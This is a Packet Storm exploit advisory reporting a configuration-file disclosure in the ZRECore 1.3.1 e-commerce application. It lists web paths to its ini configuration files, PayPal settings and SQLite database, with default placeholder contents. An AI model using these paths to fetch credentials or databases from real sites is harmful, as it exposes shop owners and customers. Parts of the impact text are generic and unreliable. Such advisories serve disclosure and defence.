what you don't know can hurt you

ZRECore 1.3.1 Database Configuration Disclosure

ZRECore 1.3.1 Database Configuration Disclosure
Posted Feb 14, 2019
Authored by KingSkrupellos

ZRECore version 1.3.1 suffers from a database configuration file disclosure vulnerability.

tags | exploit, info disclosure
MD5 | 539fd79823bc707afcb2d4a288e8a9ad

ZRECore 1.3.1 Database Configuration Disclosure

Change Mirror Download
####################################################################

# Exploit Title : ZRECore 1.3.1 Database Config Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 14/02/2019
# Vendor Homepage : zend.com
# Software Download Link : github.com/zrecore/ZRECore/archive/master.zip
# Software Information Link : npmjs.com/package/zrecore
github.com/zrecore/ZRECore
# Software Version : From 1.01 to 1.3.1
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-16 [ Configuration ] ~ CWE-200 [ Information Exposure ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Description about Software :
***************************
ZRECore - The most intuitive approach to e-commerce application development.

This application provides a native Mobile and E-Commerce API to all types of PHP

applications, including Wordpress, Drupal, Joomla, and many more.

Built upon the Zend Framework MVC library, the ZRECore application provides a

stable and easily modified e-commerce API you can use directly in any PHP project.

ZRECore leverages various technologies, including Doctrine 2, Sqlite3, and jQuery

in order to provide a powerful, yet intuitive code base that any PHP programmer

can quickly understand and extend to suite their project needs.

####################################################################

# Impact :
***********
ZRECore 1.3.1 [ and other versions ] configuration file may potentially

disclose sensitive information to remote attackers.

The configuration file that ZRECore 1.3.1 stored in /application/configs/application.ini

and in different folders. HTTP requests consisting of a single character will cause the software to

disclose sensitive configuration information, including the password/database to the administrative web interface.

This file is installed, by default, with world readable and possibly world writeable permissions enabled.

This may have some potentially serious consequences as the configuration

file also stores password information in plain text.

This issue occurs because access controls on configuration files are not properly set.

An attacker can exploit this issue to retrieve potentially sensitive information.

Attackers can access config file via URL request. This may aid in further attacks.

####################################################################

# Database Config Disclosure Exploit :
********************************
/application/configs/application.ini

autoloadernamespaces.passwordHash = "PasswordHash" ;

; Database
resources.db.adapter = "PDO_SQLITE"
resources.db.params.dbname = APPLICATION_PATH "/../data/sqlite/data.sq3"
resources.EntityManager.connection.path = APPLICATION_PATH "/../data/sqlite/data.sq3"
resources.EntityManager.modelDir = APPLICATION_PATH "/models"
resources.EntityManager.proxyDir = APPLICATION_PATH "/proxies"

/application/configs/paypal.default.ini

paypal.service = "express_checkout"
paypal.api_username = "your_username"
paypal.api_password = "your_password"
paypal.api_signature = "your_api_signature"
paypal.api_version = "63.0"
paypal.authorizing_account_email = "your_paypal_email@example.com"

paypal.endpoint_url = "https://api-3t.paypal.com/nvp"
paypal.expresscheckout_url = "https://www.paypal.com/webscr"

paypal.api_username = "your_username"
paypal.api_password = "your_password"
paypal.api_signature = "your_api_signature"
paypal.authorizing_account_email = "your_paypal_email@example.com"

/data/mysql/_install.sql

/data/mysql/queueTransaction.sql

/data/sqlite/_install.sql

/data/sqlite/aclPermission.sql

/data/sqlite/aclPermission.sql

/data/sqlite/aclRole.sql

/data/sqlite/category.sql

/data/sqlite/comment.sql

/data/sqlite/coupon.sql

/data/sqlite/currency.sql

/data/sqlite/data.sq3

/data/sqlite/folder.sql

/data/sqlite/item.sql

/data/sqlite/itemCoupon.sql

/data/sqlite/itemProperty.sql

/data/sqlite/merchantGateway.sql

/data/sqlite/order.sql

/data/sqlite/orderCoupon.sql

/data/sqlite/orderItem.sql

/data/sqlite/orderService.sql

/data/sqlite/orderStatusHistory.sql

/data/sqlite/orderSubscription.sql

/data/sqlite/packageLevel.sql

/data/sqlite/page.sql

/data/sqlite/post.sql

/data/sqlite/postComment.sql

/data/sqlite/property.sql

/data/sqlite/propertyType.sql

/data/sqlite/propertyValue.sql

/data/sqlite/service.sql

/data/sqlite/serviceCoupon.sql

/data/sqlite/servicePackageLevel.sql

/data/sqlite/status.sql

/data/sqlite/subscription.sql

/data/sqlite/subscriptionCoupon.sql

/data/sqlite/subscriptionPackageLevel.sql

/data/sqlite/subscriptionService.sql

/data/sqlite/user.sql

/data/sqlite/userAcl.sql

/data/sqlite/userProfile.sql

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    34 Files
  • 2
    Jul 2nd
    15 Files
  • 3
    Jul 3rd
    9 Files
  • 4
    Jul 4th
    8 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    3 Files
  • 7
    Jul 7th
    1 Files
  • 8
    Jul 8th
    15 Files
  • 9
    Jul 9th
    15 Files
  • 10
    Jul 10th
    20 Files
  • 11
    Jul 11th
    17 Files
  • 12
    Jul 12th
    16 Files
  • 13
    Jul 13th
    2 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    20 Files
  • 16
    Jul 16th
    27 Files
  • 17
    Jul 17th
    7 Files
  • 18
    Jul 18th
    5 Files
  • 19
    Jul 19th
    12 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close